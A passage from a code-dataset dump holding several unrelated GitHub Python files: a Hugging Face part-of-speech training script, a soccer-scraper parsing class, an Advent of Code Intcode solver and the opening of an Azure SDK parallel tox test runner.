\"Pretrained tokenizer name or path if not the same as model_name\"\n })\n cache_dir: Optional[str] = field(\n default=None,\n metadata={\n \"help\":\n \"Where do you want to store the pretrained models downloaded from huggingface.co\"\n },\n )\n freeze_layers: Optional[List[str]] = field(\n default=None, metadata={\"help\": \"Which layer(s) to freeze\"})\n\n\n@dataclass\nclass DataTrainingArguments:\n \"\"\"\n Arguments pertaining to what data we are going to input our model for training and eval.\n \"\"\"\n\n task_name: Optional[str] = field(\n default=\"pos\",\n metadata={\"help\": \"The name of the task (ner, pos...).\"})\n dataset_name: Optional[str] = field(\n default=None,\n metadata={\n \"help\":\n \"The name of the dataset to use (via the datasets library).\"\n })\n dataset_config_name: Optional[str] = field(\n default=None,\n metadata={\n \"help\":\n \"The configuration name of the dataset to use (via the datasets library).\"\n })\n train_file: Optional[str] = field(\n default=None,\n metadata={\n \"help\": \"The input training data file (a csv or JSON file).\"\n })\n validation_file: Optional[str] = field(\n default=None,\n metadata={\n \"help\":\n \"An optional input evaluation data file to evaluate on (a csv or JSON file).\"\n },\n )\n test_file: Optional[str] = field(\n default=None,\n metadata={\n \"help\":\n \"An optional input test data file to predict on (a csv or JSON file).\"\n },\n )\n overwrite_cache: bool = field(\n default=False,\n metadata={\"help\": \"Overwrite the cached training and evaluation sets\"})\n preprocessing_num_workers: Optional[int] = field(\n default=None,\n metadata={\n \"help\": \"The number of processes to use for the preprocessing.\"\n },\n )\n pad_to_max_length: bool = field(\n default=False,\n metadata={\n \"help\":\n \"Whether to pad all samples to model maximum sentence length. \"\n \"If False, will pad the samples dynamically when batching to the maximum length in the batch. 
More \"\n \"efficient on GPU but very bad for TPU.\"\n },\n )\n label_all_tokens: bool = field(\n default=False,\n metadata={\n \"help\":\n \"Whether to put the label for one word on all tokens of generated by that word or just on the \"\n \"one (in which case the other tokens will have a padding index).\"\n },\n )\n\n def __post_init__(self):\n if self.dataset_name is None and self.train_file is None and self.validation_file is None:\n raise ValueError(\n \"Need either a dataset name or a training/validation file.\")\n else:\n if self.train_file is not None:\n extension = self.train_file.split(\".\")[-1]\n assert extension in [\n \"csv\", \"json\"\n ], \"`train_file` should be a csv or a json file.\"\n if self.validation_file is not None:\n extension = self.validation_file.split(\".\")[-1]\n assert extension in [\n \"csv\", \"json\"\n ], \"`validation_file` should be a csv or a json file.\"\n self.task_name = self.task_name.lower()\n\n\ndef load_args():\n v_path = Path(sys.argv[1])\n d_path = Path(sys.argv[2])\n\n v_name = v_path.name.split('.')[0]\n d_name = d_path.name.split('.')[0]\n\n with open(v_path) as f:\n args = json.load(f)\n with open(d_path) as f:\n args.update(json.load(f))\n\n while (v_path.parent / 'config.json').exists():\n v_path = v_path.parent\n print(v_path)\n args_ = args\n with open(v_path / 'config.json') as f:\n args = json.load(f)\n args.update(args_)\n\n args['output_dir'] = os.path.join(args['output_dir'], v_name, d_name)\n if os.path.exists(args['output_dir']) and args['overwrite_output_dir']:\n ckpt = 0\n\n for ckpt_path in Path(args['output_dir']).glob('checkpoint-*'):\n this_ckpt = int(ckpt_path.name.split('-')[-1])\n if this_ckpt > ckpt:\n ckpt = this_ckpt\n\n if ckpt == 0:\n print('output dir exists, but does not contain a checkpoint')\n exit(1)\n ckpt_dir = os.path.join(args['output_dir'], f'checkpoint-{ckpt}')\n print('WARNING: continuing training', ckpt_dir)\n args['model_name_or_path'] = ckpt_dir\n return args\n\n\ndef main():\n # See all possible arguments in src/transformers/training_args.py\n # or by passing the --help flag to this script.\n # We now keep distinct sets of args, for a cleaner separation of concerns.\n\n parser = HfArgumentParser(\n (ModelArguments, DataTrainingArguments, TrainingArguments))\n\n args = load_args()\n model_args, data_args, training_args = parser.parse_dict(args)\n\n if (os.path.exists(training_args.output_dir)\n and os.listdir(training_args.output_dir) and training_args.do_train\n and not training_args.overwrite_output_dir):\n raise ValueError(\n f\"Output directory ({training_args.output_dir}) already exists and is not empty.\"\n \"Use --overwrite_output_dir to overcome.\")\n\n # Setup logging\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO\n if is_main_process(training_args.local_rank) else logging.WARN,\n )\n\n # Log on each process the small summary:\n logger.warning(\n f\"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}\"\n +\n f\"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}\"\n )\n # Set the verbosity to info of the Transformers logger (on main process only):\n if is_main_process(training_args.local_rank):\n transformers.utils.logging.set_verbosity_info()\n transformers.utils.logging.enable_default_handler()\n transformers.utils.logging.enable_explicit_format()\n logger.info(\"Training/evaluation parameters 
%s\", training_args)\n\n # Set seed before initializing model.\n set_seed(training_args.seed)\n\n # Get the datasets: you can either provide your own CSV/JSON/TXT training and evaluation files (see below)\n # or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/\n # (the dataset will be downloaded automatically from the datasets Hub).\n #\n # For CSV/JSON files, this script will use the column called 'text' or the first column if no column called\n # 'text' is found. You can easily tweak this behavior (see below).\n #\n # In distributed training, the load_dataset function guarantee that only one local process can concurrently\n # download the dataset.\n if data_args.dataset_name is not None:\n # Downloading and loading a dataset from the hub.\n datasets = load_dataset(data_args.dataset_name,\n data_args.dataset_config_name)\n else:\n data_files = {}\n if data_args.train_file is not None:\n data_files[\"train\"] = data_args.train_file\n if data_args.validation_file is not None:\n data_files[\"validation\"] = data_args.validation_file\n if data_args.test_file is not None:\n data_files[\"test\"] = data_args.test_file\n extension = data_args.train_file.split(\".\")[-1]\n datasets = load_dataset(extension, data_files=data_files)\n # See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at\n # https://huggingface.co/docs/datasets/loading_datasets.html.\n\n if training_args.do_train:\n column_names = datasets[\"train\"].column_names\n else:\n column_names = datasets[\"validation\"].column_names\n text_column_name = \"tokens\" if \"tokens\" in column_names else column_names[0]\n label_column_name = (f\"{data_args.task_name}_tags\"\n if f\"{data_args.task_name}_tags\" in column_names else\n column_names[1])\n\n label_names = LABEL_SETS[data_args.task_name]\n id2label = dict(enumerate(label_names))\n label2id = {l: i for i, l in id2label.items()}\n\n # Load pretrained model and tokenizer\n #\n # Distributed training:\n # The .from_pretrained methods guarantee that only one local process can concurrently\n # download model & vocab.\n config = AutoConfig.from_pretrained(\n model_args.config_name\n if model_args.config_name else model_args.model_name_or_path,\n id2label=id2label,\n label2id=label2id,\n finetuning_task=data_args.task_name,\n cache_dir=model_args.cache_dir,\n )\n tokenizer = AutoTokenizer.from_pretrained(\n model_args.tokenizer_name\n if model_args.tokenizer_name else model_args.model_name_or_path,\n cache_dir=model_args.cache_dir,\n use_fast=True,\n )\n model = AutoModelForTokenClassification.from_pretrained(\n model_args.model_name_or_path,\n from_tf=bool(\".ckpt\" in model_args.model_name_or_path),\n config=config,\n cache_dir=model_args.cache_dir,\n )\n\n # Freeze layers\n if model_args.freeze_layers is not None:\n for name, p in model.named_parameters():\n if name in model_args.freeze_layers:\n p.requires_grad = False\n continue\n for lay_name in model_args.freeze_layers:\n if name.startswith(f'{lay_name}.'):\n p.requires_grad = False\n break\n\n # for name, param in model.named_parameters():\n # print(name, param.requires_grad)\n # exit(0)\n\n # Tokenizer check: this script requires a fast tokenizer.\n if not isinstance(tokenizer, PreTrainedTokenizerFast):\n raise ValueError(\n \"This example script only works for models that have a fast tokenizer. 
Checkout the big table of models \"\n \"at https://huggingface.co/transformers/index.html#bigtable to find the model types that meet this \"\n \"requirement\")\n\n # Preprocessing the dataset\n # Padding strategy\n padding = \"max_length\" if data_args.pad_to_max_length else False\n\n # Tokenize all texts and align the labels with them.\n def tokenize_and_align_labels(examples):\n tokenized_inputs = tokenizer(\n examples[text_column_name],\n padding=padding,\n truncation=True,\n # We use this argument because the texts in our dataset are lists of words (with a label for each word).\n is_split_into_words=True,\n )\n labels = []\n for i, label in enumerate(examples[label_column_name]):\n word_ids = tokenized_inputs.word_ids(batch_index=i)\n previous_word_idx = None\n label_ids = []\n for word_idx in word_ids:\n # Special tokens have a word id that is None. We set the label to -100 so they are automatically\n # ignored in the loss function.\n if word_idx is None:\n label_ids.append(-100)\n # We set the label for the first token of each word.\n elif word_idx != previous_word_idx:\n label_ids.append(label2id[label[word_idx]])\n # For the other tokens in a word, we set the label to either the current label or -100, depending on\n # the label_all_tokens flag.\n else:\n label_ids.append(label2id[label[word_idx]] if data_args.\n label_all_tokens else -100)\n previous_word_idx = word_idx\n\n labels.append(label_ids)\n tokenized_inputs[\"labels\"] = labels\n return tokenized_inputs\n\n tokenized_datasets = datasets.map(\n tokenize_and_align_labels,\n batched=True,\n num_proc=data_args.preprocessing_num_workers,\n load_from_cache_file=not data_args.overwrite_cache,\n )\n\n # Data collator\n data_collator = DataCollatorForTokenClassification(tokenizer)\n\n # Metrics\n def compute_metrics(p):\n predictions, labels = p\n predictions = np.argmax(predictions, axis=2)\n\n # Remove ignored index (special tokens)\n true_predictions = [\n id2label[p] for prediction, label in zip(predictions, labels)\n for (p, lab) in zip(prediction, label) if lab != -100\n ]\n true_labels = [\n id2label[lab] for prediction, label in zip(predictions, labels)\n for (_, lab) in zip(prediction, label) if lab != -100\n ]\n\n mip, mir, mif, _ = precision_recall_fscore_support(true_labels,\n true_predictions,\n labels=label_names,\n average='micro')\n map, mar, maf, _ = precision_recall_fscore_support(true_labels,\n true_predictions,\n labels=label_names,\n average='macro')\n p, r, f, _ = precision_recall_fscore_support(true_labels,\n true_predictions,\n labels=label_names,\n average=None)\n\n res = {\n \"accuracy_score\": accuracy_score(true_labels, true_predictions),\n \"precision_micro\": mip,\n \"recall_micro\": mir,\n \"f1_micro\": mif,\n \"precision_macro\": map,\n \"recall_macro\": mar,\n \"f1_macro\": maf\n }\n for i, tag in enumerate(label_names):\n res.update({\n f'precision_{tag}': p[i],\n f'recall_{tag}': r[i],\n f'f1_{tag}': f[i]\n })\n return res\n\n # Initialize our Trainer\n trainer: Trainer = Trainer(\n model=model,\n args=training_args,\n train_dataset=tokenized_datasets[\"train\"]\n if training_args.do_train else None,\n eval_dataset=tokenized_datasets[\"validation\"]\n if training_args.do_eval else None,\n tokenizer=tokenizer,\n data_collator=data_collator,\n compute_metrics=compute_metrics,\n )\n\n # Training\n if training_args.do_train:\n model_path = (model_args.model_name_or_path if\n (model_args.model_name_or_path is not None\n and os.path.isdir(model_args.model_name_or_path)) else\n None)\n 
trainer.train(model_path=model_path)\n trainer.save_model() # Saves the tokenizer too for easy upload\n\n # Evaluation\n results = {}\n if training_args.do_eval:\n logger.info(\"*** Evaluate ***\")\n\n results = trainer.evaluate()\n\n output_eval_file = os.path.join(\n training_args.output_dir,\n f\"eval_results_{data_args.task_name}.txt\")\n if trainer.is_world_process_zero():\n with open(output_eval_file, \"w\") as writer:\n logger.info(\"***** Eval results *****\")\n for key, value in results.items():\n logger.info(f\" {key} = {value}\")\n writer.write(f\"{key} = {value}\\n\")\n\n # Predict\n if training_args.do_predict:\n logger.info(\"*** Predict ***\")\n\n test_dataset = tokenized_datasets[\"test\"]\n predictions, labels, metrics = trainer.predict(test_dataset)\n predictions = np.argmax(predictions, axis=2)\n\n # Remove ignored index (special tokens)\n true_predictions = [[\n id2label[p] for (p, lab) in zip(prediction, label) if lab != -100\n ] for prediction, label in zip(predictions, labels)]\n\n output_test_results_file = os.path.join(training_args.output_dir,\n \"test_results.txt\")\n if trainer.is_world_process_zero():\n with open(output_test_results_file, \"w\") as writer:\n for key, value in metrics.items():\n logger.info(f\" {key} = {value}\")\n writer.write(f\"{key} = {value}\\n\")\n\n # Save predictions\n output_test_predictions_file = os.path.join(training_args.output_dir,\n \"test_predictions.txt\")\n if trainer.is_world_process_zero():\n with open(output_test_predictions_file, \"w\") as writer:\n for prediction in true_predictions:\n writer.write(\" \".join(prediction) + \"\\n\")\n\n return results\n\n\ndef _mp_fn(index):\n # For xla_spawn (TPUs)\n main()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "wietsedv/low-resource-adapt", "sub_path": "src/train/train_pos.py", "file_name": "train_pos.py", "file_ext": "py", "file_size_in_byte": 18388, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 38, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 43, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 43, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 49, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 49, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 55, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 55, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 62, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 62, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 62, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 72, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 72, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 75, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 75, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 81, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 81, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 87, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 87, "usage_type": "call"}, {"api_name": 
"typing.Optional", "line_number": 92, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 92, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 99, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 99, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 106, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 109, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 109, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 115, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 124, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 66, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 152, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 153, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 153, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 159, "usage_type": "call"}, {"api_name": "json.load", "line_number": 161, "usage_type": "call"}, {"api_name": "json.load", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path", "line_number": 172, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 175, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 183, "usage_type": "call"}, {"api_name": "os.path", "line_number": 183, "usage_type": "attribute"}, {"api_name": "transformers.HfArgumentParser", "line_number": 194, "usage_type": "call"}, {"api_name": "transformers.TrainingArguments", "line_number": 195, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 200, "usage_type": "call"}, {"api_name": "os.path", "line_number": 200, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 201, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 208, "usage_type": "call"}, {"api_name": "transformers.trainer_utils.is_main_process", "line_number": 212, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 211, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 212, "usage_type": "attribute"}, {"api_name": "transformers.trainer_utils.is_main_process", "line_number": 222, "usage_type": "call"}, {"api_name": "transformers.utils.logging.set_verbosity_info", "line_number": 223, "usage_type": "call"}, {"api_name": "transformers.utils", "line_number": 223, "usage_type": "attribute"}, {"api_name": "transformers.utils.logging.enable_default_handler", "line_number": 224, "usage_type": "call"}, {"api_name": "transformers.utils", "line_number": 224, "usage_type": "attribute"}, {"api_name": "transformers.utils.logging.enable_explicit_format", "line_number": 225, "usage_type": "call"}, {"api_name": "transformers.utils", "line_number": 225, "usage_type": "attribute"}, {"api_name": "transformers.set_seed", "line_number": 229, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 242, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 253, "usage_type": "call"}, {"api_name": "utils.LABEL_SETS", "line_number": 266, "usage_type": "name"}, {"api_name": "transformers.AutoConfig.from_pretrained", "line_number": 275, 
"usage_type": "call"}, {"api_name": "transformers.AutoConfig", "line_number": 275, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 283, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 283, "usage_type": "name"}, {"api_name": "transformers.AutoModelForTokenClassification.from_pretrained", "line_number": 289, "usage_type": "call"}, {"api_name": "transformers.AutoModelForTokenClassification", "line_number": 289, "usage_type": "name"}, {"api_name": "transformers.PreTrainedTokenizerFast", "line_number": 312, "usage_type": "argument"}, {"api_name": "datasets.map", "line_number": 355, "usage_type": "call"}, {"api_name": "transformers.DataCollatorForTokenClassification", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 368, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_recall_fscore_support", "line_number": 380, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_recall_fscore_support", "line_number": 384, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_recall_fscore_support", "line_number": 388, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 394, "usage_type": "call"}, {"api_name": "trainer.Trainer", "line_number": 411, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 427, "usage_type": "call"}, {"api_name": "os.path", "line_number": 427, "usage_type": "attribute"}, {"api_name": "trainer.train", "line_number": 429, "usage_type": "call"}, {"api_name": "trainer.save_model", "line_number": 430, "usage_type": "call"}, {"api_name": "trainer.evaluate", "line_number": 437, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 439, "usage_type": "call"}, {"api_name": "os.path", "line_number": 439, "usage_type": "attribute"}, {"api_name": "trainer.is_world_process_zero", "line_number": 442, "usage_type": "call"}, {"api_name": "trainer.predict", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 455, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 462, "usage_type": "call"}, {"api_name": "os.path", "line_number": 462, "usage_type": "attribute"}, {"api_name": "trainer.is_world_process_zero", "line_number": 464, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 471, "usage_type": "call"}, {"api_name": "os.path", "line_number": 471, "usage_type": "attribute"}, {"api_name": "trainer.is_world_process_zero", "line_number": 473, "usage_type": "call"}]}
+{"seq_id": "19999066690", "text": "from Soup import Soup\nfrom datetime import datetime, time, date\n\nclass MatchHeadingSoup(Soup):\n\n def __init__(self,soup):\n Soup.__init__(self, soup)\n\n def get_date_of_match(self):\n month_year = self.get_soup().find('span', class_='month').text.strip().split('/')\n hour_min = self.get_soup().find('span', class_='hour').text.strip().split(':')\n\n # Find date of the game\n day = int(self.get_soup().find('span', class_='day').text.strip())\n month = int(month_year[0])\n year = int(month_year[1])\n\n # Find hour of the game\n hour = int(hour_min[0])\n minute = int(hour_min[1])\n\n # Combine date and time together\n d = date(year, month, day)\n t = time(hour, minute)\n\n return datetime.combine(d, t)\n\n def get_match_detail_url(self):\n return self.get_soup().find('div', class_='season__game-action grid-16 grid-mt-12 grid-msw-48').a['href']\n", "repo_name": "StanislawAbyszkin/Soccer-Web-Scraper", "sub_path": "Scraper/SoupModels/SoupMatchHeading.py", "file_name": "SoupMatchHeading.py", "file_ext": "py", "file_size_in_byte": 944, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "Soup.Soup", "line_number": 4, "usage_type": "name"}, {"api_name": "Soup.Soup.__init__", "line_number": 7, "usage_type": "call"}, {"api_name": "Soup.Soup", "line_number": 7, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime.combine", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "name"}]}
+{"seq_id": "18132819923", "text": "#!/usr/bin/python\r\nimport sys\r\nimport itertools \r\n\r\ndef resetdata():\r\n ans = []\r\n prog = open('advent07.txt').readlines()\r\n for a in prog[0].split(\",\"):\r\n ans.append(int(a))\r\n return ans\r\n\r\ndef combos(mydata):\r\n listA = [0,1,2,3,4]\r\n perm = itertools.permutations(listA) \r\n maxthrust = 0\r\n maxthrustcombo = []\r\n\r\n for i in list(perm): \r\n # pass mydata, then an array of inputs from right to left (pop)\r\n # print(\"processed 0,{} ao={}\".format(i[0],ao)) \r\n ao = processa(mydata,[0,i[0]]) # A\r\n bo = processa(mydata,[ao,i[1]]) # B\r\n co = processa(mydata,[bo,i[2]]) # C\r\n do = processa(mydata,[co,i[3]]) # D\r\n eo = processa(mydata,[do,i[4]]) # E\r\n if eo > maxthrust:\r\n maxthrust = eo\r\n maxthrustcombo = i\r\n print (\"Max with {} is {}\".format(maxthrust,maxthrustcombo))\r\n\r\n\r\ndef processa(mydata,ins):\r\n\r\n lenmydata = len(mydata)\r\n i = 0\r\n while (i < lenmydata and mydata[i] != 99 ):\r\n # print(mydata)\r\n oc = mydata[i]%10\r\n if mydata[i] > 100 and int(mydata[i]/100)%10 == 1:\r\n p1 = 1 # immediate\r\n else:\r\n p1 = 0 # positional\r\n if mydata[i] > 1000:\r\n p2 = 1\r\n else:\r\n p2 = 0\r\n if (4 == oc):\r\n if p1:\r\n dout = mydata[i+1]\r\n else:\r\n dout = mydata[mydata[i+1]]\r\n #print(\"output: {}\".format(dout))\r\n return dout\r\n i += 2\r\n elif (3 == oc):\r\n mydata[mydata[i+1]] = ins.pop()\r\n i += 2\r\n else:\r\n a = mydata[i+1]\r\n b = mydata[i+2]\r\n p = mydata[i+3] # always positional\r\n #print (\"setof4 ocfull:{},a:{},b:{},p:{},|,p1:{},p2:{}\".format(mydata[i],a,b,p,p1,p2))\r\n # 000oo\r\n if p1:\r\n av = a\r\n else:\r\n av = mydata[a]\r\n if p2:\r\n bv = b\r\n else:\r\n bv = mydata[b]\r\n #print (\"av,bv={},{}\".format(av,bv))\r\n if (1 == oc):\r\n mydata[p] = av + bv\r\n i += 4\r\n elif (2 == oc):\r\n mydata[p] = av * bv\r\n i += 4\r\n elif (5 == oc):\r\n # Opcode 5 is jump-if-true: if the first parameter is non-zero, it sets the instruction pointer to the value from the second parameter.\r\n # Otherwise, it does nothing.\r\n if 0 != av:\r\n i = bv\r\n else:\r\n i += 3\r\n elif (6 == oc):\r\n # Opcode 6 is jump-if-false: if the first parameter is zero, it sets the instruction pointer to the value from the second parameter.\r\n # Otherwise, it does nothing.\r\n if 0 == av:\r\n i = bv\r\n else:\r\n i += 3\r\n elif (7 == oc):\r\n # Opcode 7 is less than: if the first parameter is less than the second parameter, it stores 1 in the position given by the third parameter.\r\n # Otherwise, it stores 0.\r\n if av < bv:\r\n mydata[p] = 1\r\n i += 4\r\n else:\r\n mydata[p] = 0\r\n i += 4\r\n elif (8 == oc):\r\n # Opcode 8 is equals: if the first parameter is equal to the second parameter, it stores 1 in the position given by the third parameter.\r\n # Otherwise, it stores 0.\r\n if av == bv:\r\n mydata[p] = 1\r\n i += 4\r\n else:\r\n mydata[p] = 0\r\n i += 4\r\n else:\r\n i += 1 \r\nif __name__ == \"__main__\":\r\n mydata = resetdata()\r\n #print (mydata)\r\n combos(mydata)\r\n", "repo_name": "allanpaschall/Advent2019", "sub_path": "2019/Bryan/day07a.py", "file_name": "day07a.py", "file_ext": "py", "file_size_in_byte": 3896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "itertools.permutations", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "43092391196", "text": "import sys\nimport os\nimport errno\nimport shutil\nimport re\nimport multiprocessing\nimport glob\n\nif sys.version_info < (3, 0):\n from Queue import Queue\nelse:\n from queue import Queue\nfrom threading import Thread\n\nfrom subprocess import Popen, PIPE, STDOUT\nfrom common_tasks import (\n process_glob_string,\n run_check_call,\n cleanup_folder,\n clean_coverage,\n log_file,\n read_file,\n is_error_code_5_allowed,\n create_code_coverage_params,\n find_whl,\n parse_setup\n)\n\nfrom pkg_resources import parse_requirements, RequirementParseError\nimport logging\n\nlogging.getLogger().setLevel(logging.INFO)\n\nroot_dir = os.path.abspath(os.path.join(os.path.abspath(__file__), \"..\", \"..\", \"..\"))\ncoverage_dir = os.path.join(root_dir, \"_coverage/\")\npool_size = multiprocessing.cpu_count() * 2\nDEFAULT_TOX_INI_LOCATION = os.path.join(root_dir, \"eng/tox/tox.ini\")\nIGNORED_TOX_INIS = [\"azure-cosmos\"]\ntest_tools_path = os.path.join(root_dir, \"eng\", \"test_tools.txt\")\ndependency_tools_path = os.path.join(root_dir, \"eng\", \"dependency_tools.txt\")\n\nclass ToxWorkItem:\n def __init__(self, target_package_path, tox_env, options_array):\n self.target_package_path = target_package_path\n self.tox_env = tox_env\n self.options_array = options_array\n\n\nclass Worker(Thread):\n def __init__(self, tasks):\n Thread.__init__(self)\n self.tasks = tasks\n self.daemon = True\n self.start()\n\n def run(self):\n while True:\n func, args, kargs = self.tasks.get()\n try:\n func(*args, **kargs)\n except Exception as e:\n logging.error(e)\n finally:\n self.tasks.task_done()\n\n\ndef in_ci():\n return os.getenv(\"TF_BUILD\", False)\n\n\nclass ThreadPool:\n def __init__(self, num_threads):\n self.tasks = Queue(num_threads)\n for _ in range(num_threads):\n Worker(self.tasks)\n\n def add_task(self, func, *args, **kargs):\n self.tasks.put((func, args, kargs))\n\n def map(self, func, args_list):\n for args in args_list:\n self.add_task(func, args)\n\n def wait_completion(self):\n self.tasks.join()\n\n\ndef combine_coverage_files(targeted_packages):\n # find tox.ini file. 
tox.ini is used to combine coverage paths to generate a formatted report\n    tox_ini_file = os.path.join(root_dir, \"eng\", \"tox\", \"tox.ini\")\n    config_file_flag = \"--rcfile={}\".format(tox_ini_file)\n\n    if os.path.isfile(tox_ini_file):\n        # for every individual coverage file, run coverage combine to combine paths\n        for package_dir in [package for package in targeted_packages]:\n            coverage_file = os.path.join(package_dir, \".coverage\")\n            if os.path.isfile(coverage_file):\n                cov_cmd_array = [sys.executable, \"-m\", \"coverage\", \"combine\"]\n                # tox.ini file has coverage paths to combine\n                # Pass tox.ini as the coverage config file\n                cov_cmd_array.extend([config_file_flag, coverage_file])\n                run_check_call(cov_cmd_array, package_dir)\n    else:\n        # not a hard error at this point\n        # this combine step is only required for modules whose report has a package name starting with .tox\n        logging.error(\"tox.ini is not found in path {}\".format(root_dir))\n\n\ndef collect_tox_coverage_files(targeted_packages):\n    root_coverage_dir = os.path.join(root_dir, \"_coverage/\")\n\n    clean_coverage(coverage_dir)\n\n    # coverage combine fixes this with the help of tox.ini[coverage:paths]\n    coverage_files = []\n    for package_dir in [package for package in targeted_packages]:\n        coverage_file = os.path.join(package_dir, \".coverage\")\n        if os.path.isfile(coverage_file):\n            destination_file = os.path.join(\n                root_coverage_dir, \".coverage_{}\".format(os.path.basename(package_dir))\n            )\n            shutil.copyfile(coverage_file, destination_file)\n            coverage_files.append(destination_file)\n\n    logging.info(\"Uploading .coverage files: {}\".format(coverage_files))\n\n\n\ndef individual_workload(tox_command_tuple, workload_results):\n    pkg = os.path.basename(tox_command_tuple[1])\n    stdout = os.path.join(tox_command_tuple[1], \"stdout.txt\")\n    stderr = os.path.join(tox_command_tuple[1], \"stderr.txt\")\n    tox_dir = os.path.join(tox_command_tuple[1], \"./.tox/\")\n\n    with open(stdout, \"w\") as f_stdout, open(stderr, \"w\") as f_stderr:\n        proc = Popen(\n            tox_command_tuple[0],\n            stdout=f_stdout,\n            stderr=f_stderr,\n            cwd=tox_command_tuple[1],\n            env=os.environ.copy(),\n        )\n\n        logging.info(\"Popen'ed task for {}\".format(pkg))\n        proc.wait()\n\n        return_code = proc.returncode\n\n        if proc.returncode != 0:\n            logging.error(\"{} returned with code {}\".format(pkg, proc.returncode))\n        else:\n            logging.info(\n                \"{} returned with code 0, output will be printed after the test run completes.\".format(\n                    pkg\n                )\n            )\n\n        if read_file(stderr):\n            logging.error(\"Package {} had stderr output. 
Logging.\".format(pkg))\n return_code = \"StdErr output detected\"\n\n workload_results[tox_command_tuple[1]] = (return_code, stdout, stderr)\n\n if in_ci():\n shutil.rmtree(tox_dir)\n\n\ndef execute_tox_parallel(tox_command_tuples):\n pool = ThreadPool(pool_size)\n workload_results = {}\n run_result = 0\n\n for index, cmd_tuple in enumerate(tox_command_tuples):\n pool.add_task(individual_workload, cmd_tuple, workload_results)\n\n pool.wait_completion()\n\n for key in workload_results.keys():\n log_file(workload_results[key][1])\n\n if workload_results[key][0] != 0:\n logging.error(\n \"{} tox invocation exited with returncode {}\".format(\n os.path.basename(key), workload_results[key][0]\n )\n )\n run_result = 1\n\n return run_result\n\n\ndef compare_req_to_injected_reqs(parsed_req, injected_packages):\n if parsed_req is None:\n return False\n\n return any(parsed_req.name in req for req in injected_packages)\n\n\ndef inject_custom_reqs(file, injected_packages, package_dir):\n req_lines = []\n injected_packages = [p for p in re.split(\"[\\s,]\", injected_packages) if p]\n\n if injected_packages:\n logging.info(\n \"Adding custom packages to requirements for 